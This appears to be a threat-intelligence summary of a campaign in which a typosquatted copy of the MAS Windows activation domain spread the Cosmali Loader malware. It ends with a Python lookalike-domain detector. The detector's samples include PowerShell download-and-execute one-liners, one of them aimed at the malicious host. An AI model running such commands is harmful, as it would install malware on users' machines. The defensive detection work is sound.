Typosquatted MAS Domain Distributes Cosmali Loader Malware
Summary
A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool has been used to distribute the Cosmali Loader malware via malicious PowerShell scripts. Users mistyping 'get.activated.win' as 'get.activate[.]win' were infected, leading to warnings about the malware on their systems. The malware panel is insecure, exposing infected systems to unauthorized access. The Cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT). The campaign highlights the risks of typosquatting and the importance of verifying commands before execution.
Timeline
- 24.12.2025 19:44: Typosquatted MAS Domain Distributes Cosmali Loader Malware
- Fake MAS Windows activation domain used to spread PowerShell malware — www.bleepingcomputer.com — 24.12.2025 19:44
Information Snippets
- The typosquatted domain 'get.activate[.]win' closely resembles the legitimate MAS domain 'get.activated.win', differing by a single character ('d').
  First reported: 24.12.2025 19:44 · 1 source, 1 article
- The malware panel for Cosmali Loader is insecure, allowing anyone viewing it to access infected systems.
  First reported: 24.12.2025 19:44 · 1 source, 1 article
- Cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT).
  First reported: 24.12.2025 19:44 · 1 source, 1 article
- The campaign likely originated from a well-intended researcher accessing the malware control panel to inform users of the compromise.
  First reported: 24.12.2025 19:44 · 1 source, 1 article
- MAS is an open-source tool for activating Microsoft Windows and Office using unauthorized methods, which Microsoft considers a piracy tool.
  First reported: 24.12.2025 19:44 · 1 source, 1 article
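The single-character gap between 'get.activated.win' and 'get.activate[.]win' is the kind of near miss an edit-distance check can flag in a command line before it runs. This is an added example, not code from the source article or the MAS project; the allowlist contents, the distance threshold of 2, the function names and the sample command lines are assumptions constructed for illustration.

```python
import re

# Assumption: hosts this environment expects in download-and-run one-liners.
# The single entry is the legitimate domain named on this page.
KNOWN_HOSTS = {"get.activated.win"}

# Captures the host part of a URL, tolerating defanged "[.]" separators.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-\[\]]+)", re.IGNORECASE)

def edit_distance(a, b):
    """Levenshtein distance (insert, delete, substitute) using a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(host, known=KNOWN_HOSTS, max_distance=2):
    """Return (verdict, closest_known_host): 'known', 'lookalike' or 'unknown'."""
    host = host.lower().replace("[.]", ".").rstrip(".")
    if host in known:
        return "known", host
    best = min(known, key=lambda k: edit_distance(host, k))
    if edit_distance(host, best) <= max_distance:
        return "lookalike", best  # near miss of an expected host: block and alert
    return "unknown", None

def review_command(cmdline):
    """Classify every URL host found in one command line."""
    return [(h, *classify_host(h)) for h in HOST_RE.findall(cmdline)]

# Constructed sample command lines (not captured logs). The lookalike host is
# kept defanged, as on the page; classify_host() refangs it before comparing.
SAMPLES = [
    'powershell -c "irm https://get.activated.win | iex"',
    'powershell -c "irm https://get.activate[.]win | iex"',
    'powershell -c "irm https://example.com/setup.ps1 | iex"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        for host, verdict, near in review_command(line):
            print(f"{verdict:9} {host:22} closest={near}")
```

A 'lookalike' verdict is the actionable one: the host is not on the allowlist but sits within two edits of a host that is, which matches the pattern of a mistyped command described above.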